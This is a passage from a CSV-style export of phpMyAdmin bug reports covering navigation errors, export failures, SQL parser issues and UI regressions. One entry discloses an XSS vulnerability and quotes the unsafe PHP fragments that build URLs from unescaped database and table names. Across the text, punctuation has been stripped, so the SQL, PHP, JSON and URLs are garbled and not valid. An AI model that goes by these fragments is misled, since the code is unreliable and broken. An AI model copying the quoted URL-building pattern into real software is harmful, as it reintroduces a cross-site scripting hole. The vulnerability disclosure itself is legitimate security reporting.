An error comes back ` 1054 Unknown column sortunion2.id in order clause ` Here is a sample table definition CREATE TABLE IF NOT EXISTS `sortunion1` `id` int 11) NOT NULL AUTO INCREMENT, `name` varchar 30) NOT NULL, PRIMARY KEY `id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO INCREMENT=3 ; INSERT INTO `sortunion1` `id`, `name`) VALUES 1, aaa ), 2, bbb ); CREATE TABLE IF NOT EXISTS `sortunion2` `id` int 11) NOT NULL AUTO INCREMENT, `name` varchar 30) NOT NULL, PRIMARY KEY `id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO INCREMENT=5 ; INSERT INTO `sortunion2` `id`, `name`) VALUES 1, vvv ), 2, xxx ), 3, yyy ), 4, zzz ); Sort by the id on sortunion2, then run this SELECT FROM `sortunion1` UNION SELECT FROM `sortunion2` Original URL https sourceforge.net p phpmyadmin bugs 4154 Original author svivian Found in version 4.0.9","bug"
"24444","10542","add index window.
Bug when add index window, google chrome last http www.youtube.com watch?v=PkfVupMgTdA Original URL https sourceforge.net p phpmyadmin bugs 4155 Original author poiuty Found in version 4.1.0","bug"
"24444","10543","Changing users password will delete it.
When using the Change Login Information Copy User block to update a users password, since I don t want 2 users with different pwds, I selected delete the old one from the user tables.
This results in a resultpage list of users) that seems fine.
When reloading that page however; the user disappears because it has been deleted!
Original URL https sourceforge.net p phpmyadmin bugs 4157 Original author spider 007 Found in version 4.0.9","bug"
"24444","10544","Events page says no privileges with ALL PRIVILEGES.
I have a user account s1000Admin I have a database ss 1000 User account ss1000Admin ALL PRIVILEGES on ss 1000 Problem Log in to phpMyAdmin 4.0.9 as ss1000Admin.
I cannot modify events from the Events page, error message You do not have the necessary privileges to create an event.
I can go to SQL and run code to modify events, for example ALTER EVENT eventName DISABLE; will return Your SQL query has been executed successfully http i.stack.imgur.com MftDv.jpg http i.stack.imgur.com L9cth.jpg http i.stack.imgur.com zrDr7.jpg Original URL https sourceforge.net p phpmyadmin bugs 4158 Original author ryandev00 Found in version 4.0.9","bug"
"24444","10545","bug with navigation between database and table filter.
this one was not so easy to reproduce, here are the steps you need to have at least two database, each with a few tables log in to phpmyadmin click the button in front of database1 click the button in front of Tables enter a few letters in the filter area click the button in front of database2 this error appears Fatal error Call to a member function getPresence ) on a non object in datas www vhost phpmyadmin 4.0.9 libraries navigation NavigationTree.class.php on line 700 Original URL https sourceforge.net p phpmyadmin bugs 4159 Original author mathroc Found in version 4.0.9","bug"
"24444","10546","github tagged releases.
Could you please tag the guthub releases?
https api.github.com repos phpmyadmin phpmyadmin releases is empty.
Usecase I d like to automatically download tha latest stable.
Thank you!
Original URL https sourceforge.net p phpmyadmin bugs 4412 Original author szepeviktor Found in version 3.3.7","bug"
"24444","10547","Navigation Error in Nav Tree for Search Results Past the First Page.
Observed Behavior Default tables shown on one page is 25.
After filtering the tables, when expanding a table that would normally be past the first page, a An error has occurred while loading the navigation tree error is shown.
[[img src=Selection 003.jpeg]] Expected Behavior Tables can be expanded at any time Steps to Reproduce 1.
Create some tables using the attached SQL script 2.
Expand the list of tables in the database 3.
Filter the tables by 3 4.
Expand table38 Original URL https sourceforge.net p phpmyadmin bugs 4413 Original author oparrish Found in version 4.2.7","bug"
"24444","10548","table display of performance schema DB structure.
In performance schema DB, the DB structure table seems to have a colspan issue.
Search is in Rows column; number of rows in Type , etc.
This issue appeared in 8bc21b7876387 and is in 4.2.0, not previous versions.
Original URL https sourceforge.net p phpmyadmin bugs 4414 Original author tithugues Found in version 4.2.0 Attachment http sourceforge.net p phpmyadmin bugs 4414 attachment dbPerformanceSchema.png","bug"
"24444","10549","Fatal error occurring when you refresh after a timeout on the SQL execution tab.
A bug I have found is that I executed some SQL code inside PHPMyAdmin and left it for a while meaning that my session had timed out.
I refreshed the page and I cannot be sure on the next steps as I have forgotten however I either logged in as normal or I simply didn t need to but I believe I logged in as normal after refreshing and it telling me to log back in.
At this stage I received this fatal error Fatal error Call to undefined function PMA SQP parse ) in W \xampp\phpMyAdmin\libraries\Util.class.php on line 1115 I assume it was trying to parse the SQL I already done.
A refresh normally wouldn t cause that issue so I think it s related to the session being timed out.
I m not sure if this is fixed on later versions.
Original URL https sourceforge.net p phpmyadmin bugs 4160 Original author jtallis Found in version 4.0.4","bug"
"24444","10550","after UPDATE query from inline edited SQL box, empty result table shows.
Steps to reproduce 1. click Browse tab 2. click Inline below the SQL box 3. change SELECT FROM ... to UPDATE ... 4. click Go 5. an empty result table and several PHP errors warnings appear See attached screenshot.
Tested on demo server Original URL https sourceforge.net p phpmyadmin bugs 4161 Original author rm km it Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4161 attachment Bildschirmfoto 20vom 202013 11 22 2015 3A21 3A36.png","bug"
"24444","10551","Move columns dragging buggy.
Try this in IE10 or 11.
1.
Open table structure.
2.
Click Move columns .
3.
Drag a column up or down.
4.
Try to drop it, and try to click OK .
This auto drags a different column, like a sticky cursor.
Possibly related to jQuery dragging issue in bug 4146?
Original URL https sourceforge.net p phpmyadmin bugs 4162 Original author mynetx Found in version 4.1.0","bug"
"24444","10552","Setup script does not recognize manually configured server.
Migrating from 3.5.0 to 4.0.9 I manually copied server configuration info in the cfg[ Servers ] array) into the new config file, and it is working.
Then I went through the steps here phpmyadmin doc html setup.html setup script creating the setup directory and copying my current config file into it) and tried to run the setup script.
It informed me that There are no configured servers , when in fact one is configured and working fine.
Original URL https sourceforge.net p phpmyadmin bugs 4163 Original author roblewis Found in version 4.0.9","bug"
"24444","10553","Setup thinks that a Unix style text file has Windows line endings.
When I launch setup and load my config file, the display indicates that the file is using Windows style line endings CR LF).
I have always run pMA on Macs and have never used anything but Unix style LF) line endings.
Marc Delisle advises me that setup displays this indication when it believes that pMA is running on a Windows server.
As noted, it isn t currently it s running on Mavericks Server).
I edit the config file with BBEdit, which has always been set to use Unix style line terminators.
Original URL https sourceforge.net p phpmyadmin bugs 4166 Original author roblewis Found in version 4.0.9","bug"
"24444","10554","broken view of binary fields every second three).
moinmoin pma team the new phpmyadmin has a problem to display binary fields.
in my 16 length binary is ja 16 digit number.
and now, the new pma shows on every second position a three.
a dataexport from table shows the correct numbers.
e.g.
5698475923698547 is shown as 35363938343735313233363935353437 i hope someone can fix this problem in the newest version and i think some versions previously) greetings orichienal Original URL https sourceforge.net p phpmyadmin bugs 4422 Original author orichienal Found in version 4.2.1 Attachment http sourceforge.net p phpmyadmin bugs 4422 attachment pma fehler.png","bug"
"24444","10555","pMA won t run without changes to php.ini for MySQL.
I frankly don t know a) whether this is a bug, or b) if it is, who s responsible.
But when I recently upgraded to Mavericks Server and pMA 4.0.9, pMA would not launch, instead reporting MySQL error 2002, file does not exist or socket is not configured correctly .
I had to explicitly declare the location of the connection socket as tmp mysql.sock in the php.ini file it appears in 3 places) to get things working again.
Supposedly if these are not declared in php.ini the MySQL defaults will be used, but in my case they didn t appear to be.
Original URL https sourceforge.net p phpmyadmin bugs 4167 Original author roblewis Found in version 4.0.9","bug"
"24444","10556","Rename multiple columns is not working.
Its not possible to change the name settings of more then one column at once.
see screenshot Original URL https sourceforge.net p phpmyadmin bugs 4168 Original author lord rod Found in version 4.1.0 Attachment http sourceforge.net p phpmyadmin bugs 4168 attachment rename 20multiple 20columns.jpg","bug"
"24444","10557","Table list jumps to table on click.
If you click on a table, the list scrolls to this table so its on top.
Thats annoying if you like to click one table after another or go from bottom to top.
Original URL https sourceforge.net p phpmyadmin bugs 4169 Original author lord rod Found in version 4.1.0","bug"
"24444","10558","Overflow scroll for table grid is not a good solution.
I understand the reason for horizonal scrolling of the table grid but if you have many columns and display 100 rows you can t scroll to the right.
you have to scroll the page down, scroll the table grid to the right , scroll the page up Original URL https sourceforge.net p phpmyadmin bugs 4170 Original author lord rod Found in version 4.1.0","bug"
"24444","10559","wrong values in mysql.db and mysql.user.
Hello!
we use phpmyadmin 3.5.7 on many servers debian, centos5, centos6) and webservers apache, nginx) try to change to 4.0.x first is 4.0.6, second 4.0.8 and now 4.0.10) and every same problem copy the config.ini.php to the new install and in mysql database in the tables not good displayed Seamonkey firefox wrong Internet Explorer wrong google chorme 31.0.1650.63 m wrong Opera 12.16 good !!!!
good value db z10000 redmine2 wrong value db 207a31303030305f7265646d696e6532 or similar, hexa numbers) i add two image snapshot) and other db s z10000 redmine2) is ok in every browser, only mysql db wrong Original URL https sourceforge.net p phpmyadmin bugs 4171 Original author celticaion Found in version 4.0.10 Attachment http sourceforge.net p phpmyadmin bugs 4171 attachment pma good.jpg Attachment http sourceforge.net p phpmyadmin bugs 4171 attachment pma error.jpg","bug"
"24444","10560","Incorrect redirect after timeout with signon authentification.
I use latest stable version of PHPMyAdmin with signon authentification and PHPMyAdmin makes incorrect redirect after timeout to my login page.
When I click something after timeout, in Firebug I see GET sql.php 302 Moved Temporarily GET myloginpage.php Redirect to myloginpage.php is correct, but everything this happens inside of AJAX callback of PHPMyAdmin only, thus this does not redirects frontend of PHPMyAdmin actually.
Instead of it frontend of PHPMyAdmin displays Loading message only forever.
Original URL https sourceforge.net p phpmyadmin bugs 4172 Original author maximvol Found in version 4.0.10","bug"
"24444","10561","Transformations overview not reachable.
Since 4.0, the overview of transformations is no longer reachable.
Original URL https sourceforge.net p phpmyadmin bugs 4173 Original author lem9 Found in version 4.1.0","bug"
"24444","10562","Loading message keeps displaying with check all option.
When I select a table, tab browse, check all, delete.
Confirm.
The loading message is not hide after the query was executed.
The query is correcty executed.
Original URL https sourceforge.net p phpmyadmin bugs 4175 Original author soqrate Found in version 4.0.10","bug"
"24444","10563","Editing a large number of rows merely a few dozens) takes ridiculously long and leads to unisable interface.
Steps to reproduce browse a table with about 40 50 rows click the show all button on the top select all rows with the check all checkbox at the bottom click Edit Expected it should take a fraction of a second to open the editing interface, and it should be in a new clean page, not a stupid popup like draggable overlay which only makes sense for small amount of lines.
Or at the very least, if it must be in a popup because popup ajax is always cooler for its own sake, apparently), then it should be correctly positioned within the window, fast to load, usable, and you shouldn t need to scroll the containing page to view the whole popup which has its own scroller inside).
Observed the editing interface that allows you to edit the selected data) takes a painful long time to open, during which the browser hangs and stop responding it s clearly not loading time, it s time spent in some overly inefficient javascript loop I guess); it takes so long that most of the times the browser will even issue the warning that a script is not responding and prompt you whether to kill it.
But I choose wait and the editing interface finally opens.
It opens in a fancy popup like draggable overlay, which is ridiculously ill positioned starting near to the bottom of the current window), so that you have to scroll the containing page in order to see the whole popup, which in turn has its own scroller the latter being ok).
The popup should be positioned fixed to the viewport, not to the page.
Also, the popup is awfully slow to drag.
This is a regression.
The old style interface, where editing rows would lead to a new fresh window rather than open a popup, was FAR more usable.
The new everything in fancy ajax popups at all costs way of doing things is a huge step backwards.
In cases like this, the popup should not exist the editing interface should open in a new page, taking all the necessary precautions so that you could go back to the previous page with the browser back button.
That is possible.
Unless the popup can be made decent, clean, usable and functional, which it definitely is not, currently.
Just one more case in which usability is being unnecessarily sacrificed in favour of questionable) aesthetics.
Original URL https sourceforge.net p phpmyadmin bugs 4176 Original author sistisette Found in version 4.0.4","bug"
"24444","10564","No date widget when editing rows.
One more stupid regression.
When editing rows in a table with DATETIME fields, there used to be a calendar widget for settings dates.
Now it s gone.
Just a plain textfield.
Original URL https sourceforge.net p phpmyadmin bugs 4177 Original author sistisette Found in version 4.0.4","bug"
"24444","10565","Move columns not working properly jQuery UI bug).
To reproduce the bug try this 1.
Open table structure.
2.
Click Move columns .
3.
Move the second last column to the last column.
The second last column never moves to the last column while every other move is possible.
Tested using versions 4.2.0 dev 4.0.10 Browser Google chrome Original URL https sourceforge.net p phpmyadmin bugs 4179 Original author architv Found in version 4.0.10","bug"
"24444","10566","Hang on connecting to phpmyadmin via domain name but not localhost.
The following work for me as expected, trying to connect to a configured phpmyadmin installation http localhost myphpadmindir connecting from the host itself http myhost.mydomain myphpadmindir connecting from any other host http localhost myphpadmindir setup index.php connecting from the host itself but the following just hangs and never returns does not show login page) http myhost.mydomain myphpadmindir connecting from the host itself This is phpmyadmin 4.1.0, MySQL 5.6.15, Apache 2.2.24 Unix), PHP 5.4.17, MacOSX 10.9, mysqli, any browser tried several).
No error messages are shown in any logs.
Original URL https sourceforge.net p phpmyadmin bugs 4180 Original author ralphrmartin Found in version 4.1.0","bug"
"24444","10567","Problems due to missing enforcement of the minimum supported MySQL version.
System Software Specifications MySQL 5.0.27 standard 32 bit) Windows 7 64 bit) PHPMyAdmin 4.2.2 Steps to reproduce bug 1.
Create a new table use any name) with a column use any name) that is a signed INT, auto increment, and a primary key and the table is charset=latin1 and engine=MyISAM.
2.
Export the table using PHPMyAdmin defaults.
3.
Drop the table from the database.
4.
Import the exported SQL.
During the import an error should occur that says, 1075 Incorrect table definition; there can be only one auto column and it must be defined as a key.
This happens because the CREATE TABLE statement does not set the primary key, that happens later with a ALTER TABLE statement.
I would have thought this to be more of a MySQL bug, however, if I use a SHOW CREATE TABLE statement on this table the primary key is part of the CREATE TABLE statement.
Original URL https sourceforge.net p phpmyadmin bugs 4437 Original author tasty wheat Found in version 4.2.2","bug"
"24444","10568","Adding columns in table creation clears existing columns.
In phpMyAdmin 4.1.0 and 4.2.0 dev while creating a table, when you add more columns and click Go , the columns are added but all previously entered data on the form disappear and you need to enter them again.
Original URL https sourceforge.net p phpmyadmin bugs 4181 Original author saygin76 Found in version 4.1.0","bug"
"24444","10569","A fatal JavaScript error has occurred.
Helley guys, if I delete an Index in structes overview, I see an error A fatal JavaScript error has occurred.
Would you like to send an error report?
If I click on Show report details I can see the following report { exception { mode onerror , message TypeError url is undefined , stack [ { line 154, func refreshMain , context [ return void , , refreshMain function url, callback) { , if !
url) { , url = selflink a ).attr href ); , url = url.substring 0, url.indexOf ?
)); , } , url = PMA commonParams.getUrlQuery ); , , {href url}) , .appendTo body ) , .click ) ], filename common.js } ], useragent Mozilla 5.0 Windows NT 6.3; WOW64; rv 26.0) Gecko 20100101 Firefox 26.0 , uri tbl structure.php?target= }, script name tbl structure.php , pma version 4.1.0 , browser name FIREFOX , browser version 26.0 , user os Win , server software Apache 2.4.7 Win32) OpenSSL 1.0.1e PHP 5.5.6 , user agent string Mozilla 5.0 Windows NT 6.3; WOW64; rv 26.0) Gecko 20100101 Firefox 26.0 , locale de , configuration storage enabled , php version 5.5.6 , microhistory { pages [ { hash db structure.php?db=wcf table= server=1 target= token=e8ad63251b99a360bee8408e4c61737a , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Anzeigen , pma text left default tab Struktur , confirm true } }, { hash sql.php?db=wcf table=wbb1 board last post server=1 target= token=e8ad63251b99a360bee8408e4c61737a , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Anzeigen , pma text left default tab Struktur , confirm true } }, { hash tbl structure.php?db=wcf table=wbb1 board last post server=1 target= token=e8ad63251b99a360bee8408e4c61737a , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Anzeigen , pma text left default tab Struktur , confirm true } }, { hash sql.php?db=wcf table=wcf1 user server=1 target= token=e8ad63251b99a360bee8408e4c61737a , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Anzeigen , pma text left default tab Struktur , confirm true } }, { hash tbl structure.php?db=wcf table=wcf1 user server=1 target= token=e8ad63251b99a360bee8408e4c61737a , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Anzeigen , pma text left default tab Struktur , confirm true } }, { hash tbl relation.php?db=wcf table=wcf1 user server=1 target= token=e8ad63251b99a360bee8408e4c61737a , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Anzeigen , pma text left default tab Struktur , confirm true } } ], current index 6 } } Now If I click in the modal window on Fehlerbericht senden , the next error is occurred.
The message is Danke fxc3xbcr die xc3x9cbermittlung dieses Berichts.
Die xc3x9cbertragung ist fehlgeschlagen.
Wenn Sie einen Fehler entdecken, senden Sie bitte einen manuellen Fehlerbericht.
Bitte aktualisieren Sie die Seite.
I hope you can understand it.
Thanks!
Original URL https sourceforge.net p phpmyadmin bugs 4183 Original author dennis1993 Found in version 4.1.0","bug"
"24444","10570","Switch to wrong page after adding an index.
Hey, if I click in the structur page on INDEX at any column, the site is refreshing an I see the page with all datas.
Now I must go back to structres.
It would be better if the page refreshes and still on structes, because if I add an index I will do more config options on structres.
I hope you understand what I mean.
Thanks you!
Original URL https sourceforge.net p phpmyadmin bugs 4184 Original author dennis1993 Found in version 4.1.0","bug"
"24444","10571","Unable to execute create procedure statement from query window.
Steps to reproduce 1.
Open a table inside the database.
2.
Click on the Edit link next to Inline link), which is inside the box for showing executed query.
This will pop up a query window.
3.
Execute an statement to create a procedure.
A blank page is shown.
Original URL https sourceforge.net p phpmyadmin bugs 4185 Original author omerjerk Found in version Latest Git","bug"
"24444","10572","No insert statement produced in SQL export for queries with alias.
Steps to reproduce 1) Execute query like this select from `sakila`.`actor` as a 2) Select some rows from displayed result table.
3) Click Export from With Selected options.
4) Export with default configurations i.e.
Format SQL, Export Method Quick).
The generated export data will not contain insert statements for the rows selected.Moreover an error is generated in export file Error reading data 1054 Unknown column actor.actor id in where clause ) Original URL https sourceforge.net p phpmyadmin bugs 4444 Original author chirayu45 Found in version 4.2.2","bug"
"24444","10573","Fatal error on SQL Export of join query.
Steps to reproduce 1) Execute a join query like this select from `sakila`.`actor` join `sakila`.`film actor` on `sakila`.`actor`.`actor id` = `sakila`.`film actor`.`actor id` 2) Click Export from Query results operation panel.
3) The export page will open with Format option being selected as blank value and Method as Quick .
Click Go as it is.
4) Will generate a fatal error Fatal error Call to a member function getExtension ) on a non object in home chirayu www phpmyadmin libraries export.lib.php on line 277 Call Stack Time Memory Function Location 1 0.0011 268712 {main} ) .. export.php 0 2 0.0102 1267656 PMA getExportFilenameAndMimetype ) .. export.php 292 Actually, the Format dropdown seems to be selected with blank but actually that is something like this <option selected= selected value= sql >< option> which is like SQL export in disguise.
I am not sure whether this is the cause.
Original URL https sourceforge.net p phpmyadmin bugs 4445 Original author chirayu45 Found in version 4.2.2","bug"
"24444","10574","Adding a column when creating a table does not propagate index info.
When creating a table and having a column s index selector set to some kind of index, adding a column loses the index selector.
Original URL https sourceforge.net p phpmyadmin bugs 4186 Original author lem9 Found in version 4.1.0","bug"
"24444","10575","PMA SQP parse ) unexpected behaviour.
Issue 1 If query passed to PMA SQP parse ) contains this without quotes) then all the alpha type tokens such as alpha identifier , alpha reservedWord etc.
are detected as alpha causing incorrect parsing.
can appear as delimiter in queries.
For e.g.
<?php echo With ; query = CREATE TABLE x ; var dump PMA SQP parse query)); echo Without ; query = CREATE TABLE x ; var dump PMA SQP parse query)); ?> Will generate this output http pastebin.com RSQzKfNC Issue 2 PMA SQP parse ) replaces all line endings in query passed to unix style \n) and then parse without changing the actual query passed.
It causes problem if query contains \r\n style line endings because the pos now gives wrong values by 1 position) wrt to actual query.
The error in pos gets accumulated with each such line ending.
If someone wants to manipulate such query based on the pos values given by PMA SQP parse ) it results in undesired behaviour because actual query and query parsed by it are different in terms of line endings and thus pos values are not applicable to actual query.
Original URL https sourceforge.net p phpmyadmin bugs 4447 Original author chirayu45 Found in version Latest Git","bug"
"24444","10576","SQL query inline edit doesn t post changes on the first run.
After you run an SQL query, if you edit that query from the inline link and click Go , the initial query is post again instead of the new query.
When you repeat the same procedure, this time the new query is post correctly.
Original URL https sourceforge.net p phpmyadmin bugs 4187 Original author saygin76 Found in version 4.1.1","bug"
"24444","10577","Hhorizontal scrollbar don t appear in the screen..
When we have enter on some row, the space take the double size in height, so since you put the horizontal scrollbar on the frame of the data, even if I have only 25 rows I don t see the scrollbar, I need to scroll down each time I want to move to see data, it s very annoying.
I ve included a screen capture Original URL https sourceforge.net p phpmyadmin bugs 4188 Original author jfdionne Found in version 4.1.1 Attachment http sourceforge.net p phpmyadmin bugs 4188 attachment no scroll.png","bug"
"24444","10578","all menu don t work after two click.
Hello, I have a problem when I click on two items in menu in left column and top menu), after, the clicks produce nothing.
I must open link with right click > open in a new tab window There is no error javascript) displayed in console.
here my config System Linux debian 3.2.0 4 amd64 PHP 5.4.4 Mysql 5.5.31 This is a manual installation of phpmyadmin not a debian package distribution) I hope you understand my english Thanks, Philippe Original URL https sourceforge.net p phpmyadmin bugs 4189 Original author philoulheinz Found in version 4.1.0","bug"
"24444","10579","Fractional seconds cause row update even if the value is not changed.
When you edit a row containing a time, datetime, or timestamp column and click Go , the update query runs trying to update the time column even though its value is not changed.
This happens due to the fractional seconds in the time.
We also need an option to hide the fractional seconds like it was before.
Original URL https sourceforge.net p phpmyadmin bugs 4190 Original author saygin76 Found in version 4.1.1","bug"
"24444","10580","jquery error, code has an issue.
FILE js >jquery >src >jquery >intro.js This file ends with { Original URL https sourceforge.net p phpmyadmin bugs 4191 Original author dethron Found in version 4.1.1 Attachment http sourceforge.net p phpmyadmin bugs 4191 attachment Screen 20Shot 202013 12 20 20at 2016.33.41.png","bug"
"24444","10581","wrong icons above database list.
i just updated from 4.0.10 to 4.1.1 and i was amazed to see those icons above database list they are all wrong how can i fix them ?
Original URL https sourceforge.net p phpmyadmin bugs 4192 Original author cybernet2u Found in version 4.1.1 Attachment http sourceforge.net p phpmyadmin bugs 4192 attachment wrong icons.png","bug"
"24444","10582","A fatal JavaScript error has occurred.. Issue happens when logging in PMA using Firefox.
I m using Mac OS 10.9.1 Firefox 26.0 Server Microsoft IIS 7.0 The following error is displayed { exception { mode onerror , message ReferenceError Components is not defined , stack [ { line 14 , func ?
, uri ?
, scriptname null } ], useragent Mozilla 5.0 Macintosh; Intel Mac OS X 10.9; rv 26.0) Gecko 20100101 Firefox 26.0 , uri index.php?target= }, script name index.php , pma version 4.1.2 , browser name FIREFOX , browser version 26.0 , user os Mac , server software Microsoft IIS 7.0 , user agent string Mozilla 5.0 Macintosh; Intel Mac OS X 10.9; rv 26.0) Gecko 20100101 Firefox 26.0 , locale en , configuration storage enabled , php version 5.5.4 , microhistory { pages [ { hash index.php?db= table= server=1 target= token=4edac33e54c7a22b9c07987e7857725b } ], current index 1 } } Original URL https sourceforge.net p phpmyadmin bugs 4194 Original author demaier80 Found in version 4.1.2","bug"
"24444","10583","Your session has expired.
Please log in again..
I get the following message Your session has expired.
Please log in again.
when simply accessing the PMA page.
I have emptied the cache and I am using Firefox 26.0 on a Mac OS 10.9.1.
This issue seem to be happening only with Firefox.
Original URL https sourceforge.net p phpmyadmin bugs 4195 Original author demaier80 Found in version 4.1.2","bug"
"24444","10584","phpMyadmin hangs freezes on few rows delete queries.
Database Server Localhost via UNIX socket Server type MySQL Server version 5.5.34 0ubuntu0.13.10.1 Ubuntu) Protocol version 10 User root localhost Server charset UTF 8 Unicode utf8) Web server Apache 2.4.6 Ubuntu) Database client version libmysql 5.5.34 PHP extension mysqli Documentation On Delete queries which involve few rows the interface hangs, if I click browse the rows are however deleted so the interface just waits for nothing.
It happens on two similar machines running both Ubuntu so it should not be configuration related.
Original URL https sourceforge.net p phpmyadmin bugs 4196 Original author borracho85 Found in version 3.3.7","bug"
"24444","10585","Hovering over pie chart gives fatal JS error.
Fixed with https github.com phpmyadmin phpmyadmin commit e3791244b5b46e2ed972feecdef06c68e1647b67 Original URL https sourceforge.net p phpmyadmin bugs 4198 Original author madhuracj Found in version 4.0.0","bug"
"24444","10586","First few characters of database name aren t clickable when expanded.
As stated in the subject, there s a way to make the database not clickable, but only the first topmost) database.
Expand the database to show the tables that make up that database).
While it s expanded, the database name isn t a link.
Once collapsing the view, it becomes a link again.
This only seems to affect the topmost database in the navigation list.
Original URL https sourceforge.net p phpmyadmin bugs 4459 Original author ibennetch Found in version Latest Git","bug"
"24444","10587","Ticket for Testing.
Ticket for Testing!!
This bug ticket is being created for development of Linking Error Report with existing bug ticket feature of error reporting server.
Kindly ignore this ticket. )
Original URL https sourceforge.net p phpmyadmin bugs 4460 Original author playingdj Found in version 3.3.7","bug"
"24444","10588","Export from an SQL Statement with join and not in, getting wrong data.
phpMyAdmin 3.3.7deb7 MySQL Server 5.1.66 0 squeeze1 log MySQL Client Version 5.1.73 PHP Plugin mysqli Executing a MySQL Request Select with join an not in, getting right data.
Using Export function getting the right amount of data, but wrong data.
e.g.
Amount is 56, getting the first 56 records from table, but not data from SELECT statement.
Export via Excel 97 2003 XLS Mappe and all others does not work.
Provider think, this is a bug, because some records have stars at beginning and or end.
SELECT x from y where y.a = 1 and y.b NOT IN SELECT z.b from z LEFT JOIN y ON y.b = z.b) WHERE z.c = 2 and z.d = 3 group by z.b) Getting records like Nice Lucy Something Another nice Lucy Anything We don t know, if the stars are responsable for this bug, but this is the only clue we have.
Original URL https sourceforge.net p phpmyadmin bugs 4462 Original author charly21 Found in version 3.3.7","bug"
"24444","10589","phpMyAdmin website Demo Server Sticky column overlapping body text.
Goto http demo.phpmyadmin.net Sticky column is overlapping body text.
Please see screen shot.
Tested on Macbook using Safari.
Original URL https sourceforge.net p phpmyadmin bugs 4199 Original author sheressa Found in version 4.1.2","bug"
"24444","10590","Missing syntax highlighting.
Syntax highlighting is missing in the following occasions 1.
Performing grid edit.
2.
Executing an SQL from SQL tab.
Original URL https sourceforge.net p phpmyadmin bugs 4200 Original author madhuracj Found in version 4.1.0","bug"
"24444","10591","Fatal error Class PMA DatabaseInterface not found Validator.class.php on line 227).
Hi, When I go to > Setup section > Overview > New server button > Configuration Storage I add an user, a password and a database name e.g.
phpmyadmin) and I submit.
I have this message > Fatal error Class PMA DatabaseInterface not found in var www pma libraries config Validator.class.php on line 227 After, from the overview section, I try to edit but I ve got the same error.
Thanks for helping ;) Original URL https sourceforge.net p phpmyadmin bugs 4463 Original author soqrate Found in version 4.2.3","bug"
"24444","10592","XSS injection due to unescaped db table name in navigation hiding.
Reported by Chirayu Chiripal lt;chirayu.chiripal gmail.com gt;.
Vulnerable Code Fragment in PMA Navigation getItemUnhideDialog ) Use of urldecode ) in construction of url instead of urlencode ) html .= <td style= width 80px ><a href= navigation.php?
.
PMA URL getCommon ) .
unhideNavItem=true .
itemType= .
t .
itemName= .
urldecode hiddenItem) .
dbName= .
urldecode dbName) .
.
class= unhideNavItem ajax > .
PMA Util getIcon lightbulb.png , Show )) .
< a>< td> ; Vulnerable Code Fragment in Node DatabaseChild getHtmlForControlButtons ) Use of urldecode ) in construction of url instead of urlencode ), from L31 to L40 ret = <span class= navItemControls > .
<a href= navigation.php?
.
PMA URL getCommon ) .
hideNavItem=true .
itemType= .
urldecode this >getItemType )) .
itemName= .
urldecode item) .
dbName= .
urldecode db) .
.
class= hideNavItem ajax > .
PMA Util getImage lightbulb off.png , Hide )) .
< a>< span> ;` Original URL https sourceforge.net p phpmyadmin bugs 4464 Original author zweisteinsoft Found in version 4.1.0","bug"
"24444","10593","Exports are not compressed.
Since https github.com phpmyadmin phpmyadmin pull 595, a compressed export is the same size or bigger than an uncompressed export.
Original URL https sourceforge.net p phpmyadmin bugs 4201 Original author lem9 Found in version 4.1.2","bug"
"24444","10594","Cannot read property token of undefined.
Steps to reproduce 1. select database f.e.
sakila) 2. select table f.e.
actor) 3. click browser back button twice Uncaught TypeError Cannot read property token of undefined Browser Chrome Multiple instances of the similar error on error reporting server too http reports.phpmyadmin.net reports view 91 396, 348, 292, 269, 93, 371 etc.
On Firefox, same steps produce record.params is undefined similar error on error reporting server 271, 180, 360, 11, 41, 88, 53, etc.
Original URL https sourceforge.net p phpmyadmin bugs 4202 Original author atul5 Found in version 4.1.2","bug"
"24444","10595","On refreshing designer, .FullScreen is undefined.
To reproduce, refresh on designer page See http reports.phpmyadmin.net reports view 345 Popup error Token mismatch also appears Browser Firefox Original URL https sourceforge.net p phpmyadmin bugs 4203 Original author atul5 Found in version 4.1.2","bug"
"24444","10596","Add a user shows additional edit user group link.
When there are no user groups defined, the Edit user group link is hidden for all existing users in the User privileges view server mode).
When a new user is added, though, the link is displayed nevertheless.
The link should be hidden for new users, too, as long as there are 0 user groups defined.
Original URL https sourceforge.net p phpmyadmin bugs 4205 Original author mynetx Found in version 4.1.2","bug"
"24444","10597","Formatting of SQL statements is no longer working.
Formatting of SQL statements is no longer working.
The syntax highlighting has been fixed ticket 4200), but not the prettyprinting of SQL, which is important during development when importing a SQL statement from a program trace into phpMyAdmin to work on it.
Original URL https sourceforge.net p phpmyadmin bugs 4206 Original author joergent Found in version 4.1.2","bug"
"24444","10598","json encode error , because strftime return string is not utf8 in Windows 8.1 Chinese version.
Util.class.php line 1656 return strftime date, timestamp); this line will not return a utf 8 string on my win8 os , but on my linux centos 6.5) is correct.
So everytime we got false by json encode ) in Response.class.php My Env OS Win8.1 Traditional Chinese version PHP 5.5.7 Original URL https sourceforge.net p phpmyadmin bugs 4207 Original author pigochu Found in version 4.1.2","bug"
"24444","10599","Can t browse tables after sorting on columns with fieldnames that have a .
1054 Unknown column field name in order clause .
Server CentOS, Mysql 5.5.
Bug observed after recent upgrade to phpMyAdmin 4.1.2.
With a table that has a column with a in the name such as `field name`.
Browse Table.
Click the column header to sort either asc or desc) the table by this field with the in the name.
Now browse some other table, or click somewhere else.
Then try to Browse this same table again this error appears.
And you are unable to access the table again.
1054 Unknown column field name in order clause Original URL https sourceforge.net p phpmyadmin bugs 4208 Original author ulamthelucky Found in version 4.1.2","bug"
"24444","10600","Missing compression in one case.
